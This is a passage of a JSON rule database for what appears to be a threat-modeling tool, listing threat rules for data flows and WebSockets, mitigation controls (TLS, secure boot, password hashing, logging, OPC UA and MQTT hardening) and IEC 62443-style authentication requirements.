3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"d675c061-7af1-4e49-a503-0b512a85f9da","Name":"Process denies receiving data","Description":"Ext. entity passes input to process. E.g., process claims not to have received data. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"427f13f4-ce93-4344-b6fc-1178ea54199e","Name":"Process is spoofed","Description":"Ext. entity gets input from process. E.g., ext. entity is confused about the identify of the process. (see Threat modeling - designing for security: Table 3-10-11)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b8d4d723-fe3b-4288-87da-c73fc2412fc5","Name":"Message sniffing","Description":"You should strongly prefer the secure wss:// protocol over the insecure ws:// transport. Like HTTPS, WSS (WebSockets over SSL/TLS) is encrypted, thus protecting against man-in-the-middle attacks. A variety of attacks against WebSockets become impossible if the transport is secured.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"fa8d45ee-bfc7-47d7-9eed-4b38bc797336","Name":"Tunneling","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","ComparisonType":"==","Value":true}}]},"Severity":3},{"ID":"db990108-a992-40e4-b2fc-d4dd00d42431","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackVectorID":"b48781b2-24a2-481b-b7c1-3390dbeeb973"},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"8cd86481-a82f-490d-8d62-2195981779e9","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"ac0e3170-0187-47e8-a2ed-6671cc24137e","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server, as well. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"7d0edcb5-7eff-490e-8d29-db68172ddd20","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","ThreatCategoryIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"485ff476-0c99-41de-b90a-4fdd27730685","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"cc7e24ac-cfc0-4cf8-a291-386735862947","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"8f9a24d4-e962-4136-b0ec-8e9f797a6f62","ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":false}}]},"Severity":3},{"ID":"341eaf3e-808c-45de-9445-6be3cc66777b","Name":"Access restriction for authorized users","Description":"Access could be restricted for authorized users if attackers use all available connections ","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["b869918c-0b47-45c3-8fab-0b698043aa66"]},"overridenRuleIDs":[],"RuleType":3,"ComponentRestriction":{"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","ComparisonType":"==","Value":true}}]},"Severity":2}],"controls":[{"ID":"99636fb9-9a42-48b5-8368-a935a11dc943","Name":"Disable debug access","Description":"","mitigatedAttackVectorIDs":["8a6476b9-7a5c-4306-bd43-db6fe32bbf66"],"MitigationTips":[{"Name":"Remove interface","Description":"Any interface used for administration or test purposes during development should be removed from a production device, disabled or made physically inaccessible.","LifeCycles":["I"]},{"Name":"Disable interface","Description":"All test access points on production units must be disabled or locked, for example by blowing on-chip fuses to disable JTAG.","LifeCycles":["P"]},{"Name":"Enable access control","Description":"If a production device must have an administration port, ensure it has effective access controls, e.g. strong credential management, restricted ports, secure protocols etc.","LifeCycles":["I"]}],"mitigatedThreatRuleIDs":["821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5"]},{"ID":"8febb6ed-da70-44ff-8d95-cf9a30d6b0ec","Name":"Device casing mitigations","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[{"Name":"PCB design","Description":"Make the device circuitry physically inaccessible to tampering, e.g. epoxy chips to circuit board, resin encapsulation, hiding data and address lines under these components etc.","LifeCycles":["I"]},{"Name":"Protective casing","Description":"Provide secure protective casing and mounting options for deployment of devices in exposed locations.","LifeCycles":["C"]},{"Name":"Tamper evident packaging","Description":"To identify and deter access within the supply chain, consider making the device and packaging \u201ctamper evident\u201d.","LifeCycles":["C"]},{"Name":"Active masking","Description":"For high-security deployments, consider design measures such as active masking or shielding to protect against side-channel attacks.","LifeCycles":["C"]}],"mitigatedThreatRuleIDs":["a3c2f053-c8d6-4626-ae54-79f87ae171c3"]},{"ID":"c943341c-b65c-4801-8d8e-d83d047ac0b7","Name":"Secure boot","Description":"","mitigatedAttackVectorIDs":[],"MitigationTips":[],"mitigatedThreatRuleIDs":["11975f59-55e0-420f-9366-513175e9236e","61e37274-9751-4250-8a4d-6476edc8f732","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4"]},{"ID":"ea061d92-c31b-4644-8f5f-5093f513dd9d","Name":"Traffic data encryption","Description":"","mitigatedAttackVectorIDs":["e58fcbde-e429-4704-9f22-c00d187994bc","bb7358c1-e5b6-424f-962d-daab17345b63","001ba17c-0400-4369-912e-0ceda3ccd227"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Mutual authentication","Description":"Use strong mutual authentication to ensure the authenticity of both endpoints. ","LifeCycles":["C"]},{"Name":"Signed certificates","Description":"Validate the authenticity of public keys by their certificates. Validate the entire certificate chain. ","LifeCycles":["I"]},{"Name":"Use TLS","Description":"Use the latest version of TLS and include only strong cipher suits. ","LifeCycles":["I"]},{"Name":"Lightweight cryptography","Description":"In case TLS is not possible due to performance issues, choose an adequate lightweight cryptography algorithm.","LifeCycles":["I"]},{"Name":"Ensure integrity","Description":"If no sensitive data are transmitted and performance is a bottle neck, ensure at least the integrity of messages using a message authentication code (MAC).","LifeCycles":["I"]},{"Name":"Ensure replay protection","Description":"Ensure that it is not possible for a captured and resend package to be treated as legitimate. ","LifeCycles":["I"]}]},{"ID":"8827b03b-475a-474f-baa1-7de740e244ba","Name":"Input validation","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html","mitigatedAttackVectorIDs":["d92ccd9c-3a24-4e07-a2ca-c1e9949bb386"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"9ed45808-7ffa-412a-ab29-84c0e738c8da","Name":"NV memory encryption","Description":"Encrypt the non-volatile memory","mitigatedAttackVectorIDs":["e851a284-6b41-41c9-9efd-dc8b01f788da"],"mitigatedThreatRuleIDs":[],"MitigationTips":[]},{"ID":"a5beea3e-c1e2-40ef-9056-8540c7f5557d","Name":"Certificate validation","Description":"","mitigatedAttackVectorIDs":["0b47795b-b42d-49d1-bf50-7f4889994fea","6509fe5f-7e27-40ec-bd08-97e29c67f8c1","ed84da5f-3181-4be1-bef4-d911077b1910","b26fc3e4-7a38-4f00-acdb-ec78246d0b25"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Certificate pinning","Description":"https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning","LifeCycles":["I"]},{"Name":"Check expiration","Description":"","LifeCycles":["I"]},{"Name":"Check certificate chain","Description":"","LifeCycles":["I"]},{"Name":"Check revocation","Description":"","LifeCycles":["I"]},{"Name":"Check properties","Description":"Check all relevant certificate properties such as hostname","LifeCycles":["I"]}]},{"ID":"af734914-6fe1-4ace-8895-a004472c9d13","Name":"True random number generator","Description":"The generation of true random numbers is essential for many cryptographic operations. However, many pseudo-random number generators (PRNGs) are not cryptographically secure.","mitigatedAttackVectorIDs":["0ffd675d-d83c-4f74-8835-398e7f3930cb"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hardware TRNG","Description":"Many modern microcontroller ship with a true random number generator (TRNG). As this entropy source may be slow, it may be necessary to combine the TRNG with a cryptographically secure PRNG (CSPRNG). ","LifeCycles":["C"]},{"Name":"Use CSPRNG","Description":"","LifeCycles":["I"]},{"Name":"Use different entropy sources","Description":"Try to collect entropy from different sources, e.g. network traffic, human interaction, etc. ","LifeCycles":["I"]},{"Name":"Test the entropy","Description":"Test the generated entropy according to NIST SP 800-90 and SP 800-22, for example.","LifeCycles":["I"]}]},{"ID":"34eb5948-314a-4a99-a782-c5ed7d26df01","Name":"Strong block cipher mode","Description":"Review the latest recommendations from organizations such as NIST.","mitigatedAttackVectorIDs":["a20d6e53-4426-4700-a04f-a4018bc7bfce"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use authenticated encryption","Description":"Modes for authenticated encryption (AE) ensure confidentiality as well as integrity. Plaintext data (e.g. in headers) can also be protected against manipulation when using a AE with associated data (AEAD). ","LifeCycles":["I"]}]},{"ID":"51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","Name":"Use IV and Nonce only once","Description":"Use an initialization vector (IV) or nonce (number used only once) only once. ","mitigatedAttackVectorIDs":["680ceebd-357c-49d6-8bfd-390dc6c51dde"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Generate the IV using a CSPRNG","Description":"While it is legit to use a counter (1, 2, 3, ...), it is more practical to use a random number (generated by a cryptographically secure pseudo random number generator, CSPRNG). As IVs often have 96 bits or more, it is improbable that a number is generated twice with a CSPRNG","LifeCycles":["I"]}]},{"ID":"43834e91-cb84-407e-9819-ffbc58b405a0","Name":"Secure password storage","Description":"","mitigatedAttackVectorIDs":["f0ef09ed-0cde-4b12-beb6-f1640132f3e6","0e3c0e3e-1587-46f8-93ea-e9091dff5958","05e04798-41ce-4919-a92b-264f7e985de2"],"mitigatedThreatRuleIDs":[],"MitigationTips":[{"Name":"Use hash with salt","Description":"Do not store the password in plain text. Store the output of a cryptographic hash function. Before hashing the password, combine it with a unique, random salt (random bit string that can be treated as public) --\x3e store hash(password | salt), for example. ","LifeCycles":["I"]},{"Name":"Use password hashing algorithm","Description":"Not all cryptographic hash algorithms are suitable for hashing, as they are too fast, e.g. SHA2. Use a password hashing algorithm such as bcrypt or argon2. ","LifeCycles":["I"]}]},{"ID":"a23f9f78-27a6-4a21-8c48-29a2afd48830","Name":"Logging","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html","mitigatedAttackVectorIDs":["71f761e4-8149-4a88-92fd-35f9d99cc0ef","afd4bceb-31b0-41cd-9eae-02d2eba6b41c"],"mitigatedThreatRuleIDs":["b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff"],"MitigationTips":[{"Name":"Separate storage","Description":"Store logs in a separate partition or memory chip.","LifeCycles":["C"]},{"Name":"Central log backup","Description":"Send logs to a central backup storage","LifeCycles":["C"]},{"Name":"Restrict access","Description":"Restrict access to log files","LifeCycles":["I"]},{"Name":"Cryptographically protect logs","Description":"Ensure confidentiality, integrity, and authenticity of log files","LifeCycles":["I"]},{"Name":"Do\'s","Description":"Log: login, logout, authentication attempt, inactivity, password change, configuration change, privilege change, failures and errors, network activity, ....","LifeCycles":["I"]},{"Name":"Don\'ts","Description":"Don\'t log: passwords\\nAvoid: personal identifiable information (PII)","LifeCycles":["I"]},{"Name":"Evaluate logs","Description":"Monitor and evaluate the logs files for anomalies","LifeCycles":["O"]},{"Name":"Ensure availability","Description":"Attackers may attack log files in order to exhaust disk space or to overwrite them. Another goal could be to decrease the application performance. ","LifeCycles":["O"]}]},{"ID":"6149966a-4422-4b32-ac28-88a2ded07354","Name":"Cloud service recovery","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b05b7085-3952-4f0d-bb85-7c380eb32f92"],"MitigationTips":[{"Name":"Adopt a geographically redudant configuration","Description":"","LifeCycles":["O"]}]},{"ID":"113386c4-73e2-4e37-a390-83c3ef939633","Name":"OPC UA secure configuration","Description":"See Practical Security Recommendations for building OPC UA Applications by OPC Fundation","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47"],"MitigationTips":[{"Name":"User authentication","Description":"The possibility of logging in with the identifier \u2018anonymous\u2019 should be used only for accessing non-critical UA server resources as it does not provide any protection","LifeCycles":["C","I"]},{"Name":"Security mode","Description":" The SecurityMode should be \u2018Sign\u2019 or \u2018SignAndEncrypt\u2019","LifeCycles":["I"]},{"Name":"Cryptographic algorithms","Description":"At a minimum, the SecurityPolicy \u2018Basic256Sha256\u2019 should be chosen","LifeCycles":["I"]},{"Name":"Use certificates","Description":"Don\u2019t accept connections which do not provide trusted certificates","LifeCycles":["I"]},{"Name":"Certificate and private key storage","Description":"Never store private keys or the corresponding certificate files (.pfx/p12) on an unencrypted file system","LifeCycles":["I"]},{"Name":" Managing and maintaining certificates","Description":"Use certificate trust lists and certificate revocation lists to manage valid certificates","LifeCycles":["I"]}]},{"ID":"6986a3d3-c10f-4ffb-a348-fafe9c8c9150","Name":"MQTT secure configuration","Description":"","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59"],"MitigationTips":[{"Name":"Define access control lists for topcis","Description":"","LifeCycles":["C","I"]},{"Name":"Use MQTT over TLS","Description":"Use MQTT over TLS on port 8883","LifeCycles":["I"]},{"Name":"Use X.509 client certificates","Description":"","LifeCycles":["I"]},{"Name":"Define maximum message size","Description":"MQTT defines a maximum message size of 256MB. In most MQTT deployment scenarios, messages are often smaller than a kilobyte. If you are familiar with your usage scenario and you know the maximum message size that can occur, it makes sense to decrease the maximum allowed message size to that limit. If no limit is set, it is possible for malicious MQTT clients to send large messages (which can result in excessive memory consumption and unneeded bandwidth usage).","LifeCycles":["I"]}]},{"ID":"76ed8c24-b89e-4eb1-9d09-a97548729ba5","Name":"DoS protection","Description":"DoS depends on the used network interfaces, protocols and operating system","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["7b825bd7-222e-476f-bf22-85fe2e50eb6c"],"MitigationTips":[{"Name":"Use challenges","Description":"Use challenges like CAPTCHA to filter requests by bots","LifeCycles":["I"]},{"Name":"Use a web application firewall","Description":"","LifeCycles":["I"]},{"Name":"Use intrusion detection/prevention system","Description":"Use a intrusion detection/prevention such as Fail2ban","LifeCycles":["I"]}]},{"ID":"bb8d07ff-b13e-437c-9483-bee76a98bb84","Name":"Anti-rollback protection","Description":"The goal of anti-rollback protection is to prevent downgrading of the device to an older version of its software, which has been deprecated due to security concerns.\\n\\nhttps://developer.trustedfirmware.org/w/tf_m/design/trusted_boot/rollback_protection/","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["c6535534-7656-4819-93fe-19d9a78a9390"],"MitigationTips":[{"Name":"Security counter","Description":"Implement an additional security counter, independently from the firmware version, to ensure anti-rollback protection. This allows downgrades to a version without bugs, for example, but prevents downgrades to vulnerable ones. ","LifeCycles":["C","I","U"]}]},{"ID":"fd548c36-f9ae-4c1e-8244-477c7d121c36","Name":"WebSocket security","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/#vulnerability-to-input-data","mitigatedAttackVectorIDs":[],"mitigatedThreatRuleIDs":["b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947"],"MitigationTips":[{"Name":"Avoid tunneling","Description":"Tunneling arbitrary TCP services via a WebSocket is easy. This is a risk that needs to be prevented. The best way to avoid this issue? Just avoid tunneling whenever possible.","LifeCycles":["C","I"]},{"Name":"Use secure wss://","Description":"","LifeCycles":["I"]},{"Name":"Validate client input","Description":"Carefully validate input before processing it","LifeCycles":["I"]},{"Name":"Validate server data","Description":"lways process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","LifeCycles":["I"]},{"Name":"Authentication / authorization","Description":"https://devcenter.heroku.com/articles/websocket-security#authentication-authorization\\nImplement a ticket-based authentication","LifeCycles":["I"]},{"Name":"Limit rate","Description":"Rate limiting is an important way to prevent abuse of your web application or web service. It can protect against bad bots, scraping attacks, and small-scale denial of service (DoS) attacks. In some cases, a malfunctioning client can result in an accidental DoS attack.","LifeCycles":["I"]},{"Name":"Use origin header","Description":"The WebSocket standard defines an Origin header field, which web browsers set to the URL that originates a WebSocket request. This can be used to differentiate between WebSocket connections from different hosts, or between those made from a browser and some other kind of network client.","LifeCycles":["I"]}]}],"controlGroups":[{"ID":"6dd5db7a-e54f-4e6f-858a-33449024cf88","Name":"Controls","Description":"","controlGroupIDs":["c324cdd7-8c3e-4d10-a91e-202a725430df","4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","627ed2f3-d2af-4f25-925b-2e93a9578a93","b6aceef6-08e1-4b2f-83a7-32c2bc736962","10c43f72-7e1c-4055-b8e8-321d17a0109e","3103fa1a-00eb-4361-864d-7f129333db08"],"controlIDs":[]},{"ID":"c324cdd7-8c3e-4d10-a91e-202a725430df","Name":"Physical Security","Description":"https://www.iotsecurityfoundation.org/wp-content/uploads/2019/12/Best-Practice-Guides-Release-2_Digitalv3.pdf","controlGroupIDs":[],"controlIDs":["99636fb9-9a42-48b5-8368-a935a11dc943","8febb6ed-da70-44ff-8d95-cf9a30d6b0ec"]},{"ID":"4df9ab6b-eb2f-4fc7-8bd7-8b6c2d03e922","Name":"Firmware Security","Description":"","controlGroupIDs":[],"controlIDs":["c943341c-b65c-4801-8d8e-d83d047ac0b7","9ed45808-7ffa-412a-ab29-84c0e738c8da","bb8d07ff-b13e-437c-9483-bee76a98bb84"]},{"ID":"627ed2f3-d2af-4f25-925b-2e93a9578a93","Name":"Network Security","Description":"","controlGroupIDs":[],"controlIDs":["ea061d92-c31b-4644-8f5f-5093f513dd9d","113386c4-73e2-4e37-a390-83c3ef939633","6986a3d3-c10f-4ffb-a348-fafe9c8c9150","76ed8c24-b89e-4eb1-9d09-a97548729ba5","fd548c36-f9ae-4c1e-8244-477c7d121c36"]},{"ID":"b6aceef6-08e1-4b2f-83a7-32c2bc736962","Name":"Application Security","Description":"","controlGroupIDs":[],"controlIDs":["8827b03b-475a-474f-baa1-7de740e244ba","a5beea3e-c1e2-40ef-9056-8540c7f5557d","a23f9f78-27a6-4a21-8c48-29a2afd48830"]},{"ID":"10c43f72-7e1c-4055-b8e8-321d17a0109e","Name":"Cryptography Mitigations","Description":"","controlGroupIDs":[],"controlIDs":["af734914-6fe1-4ace-8895-a004472c9d13","34eb5948-314a-4a99-a782-c5ed7d26df01","51afbfbf-f5f5-40f7-908f-5db63ed5e1ca","43834e91-cb84-407e-9819-ffbc58b405a0"]},{"ID":"3103fa1a-00eb-4361-864d-7f129333db08","Name":"Recovery","Description":"","controlGroupIDs":[],"controlIDs":["6149966a-4422-4b32-ac28-88a2ded07354"]}],"requirementTypes":[{"ID":"b008aede-3518-44f3-8cc2-7e92b68e0329","Name":"CR-1-1 Human user identification and authentication","Description":" ","subReqTypeIDs":["6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","91a52e70-60f4-430c-b2f8-292e80931d70"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"6dbaec8c-55cd-402e-9f9b-8089ad5d8e88","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"6391f8f2-eb04-4caf-b490-49c920315867","ComparisonType":"==","Value":true}},"NeedsReview":false,"RuleType":1}},{"ID":"91a52e70-60f4-430c-b2f8-292e80931d70","Name":"RE-2 Multifactor authentication for all interfaces","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":true}},"NeedsReview":true}},{"ID":"d47f441d-e3bf-461d-b724-47a90c19bc89","Name":"CR-1-2 Software process and device identification and authentication","Description":"","subReqTypeIDs":["3480145a-7767-48e8-a55c-09514771d17f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3480145a-7767-48e8-a55c-09514771d17f","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"83a019dd-d28b-4f3d-bf48-e254d2031445","Name":"CR-1-3 Account management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"b7bcf087-c925-4eec-9a11-e042250afbf1","Name":"CR-1-4 Identifier management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"f28381c7-5c24-4fd3-b75e-03fbebe03857","Name":"CR-1-5 Authenticator management","Description":"","subReqTypeIDs":["afa6717a-657d-462f-be28-04fe00231224"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"afa6717a-657d-462f-be28-04fe00231224","Name":"RE-1 Hardware security for authenticators","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"bd31bc1e-43ed-48f2-80ae-885680bcd378","Name":"CR-1-6 Wireless access management","Description":"","subReqTypeIDs":["cb2f2e32-bd57-4fed-8c04-9efd325ecc08"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"cb2f2e32-bd57-4fed-8c04-9efd325ecc08","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"40670f38-5fd9-47a3-994b-41a271a71694","Name":"CR-1-7 Strength of password-based authentication","Description":"","subReqTypeIDs":["41bd377e-a304-44ae-aabc-807d51f3772d","9b275641-37b2-4da1-a70a-1cc365085a99"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":true}}}},{"ID":"41bd377e-a304-44ae-aabc-807d51f3772d","Name":"RE-1 Password generation and lifetime restrictions for human users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"","ComparisonType":"==","Value":true}}}},{"ID":"9b275641-37b2-4da1-a70a-1cc365085a99","Name":"RE-2 Password lifetime restrictions for all users (human, software, process or device)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"72982bda-38dc-4904-8080-4e7a37df743d","Name":"CR-1-8 Public key 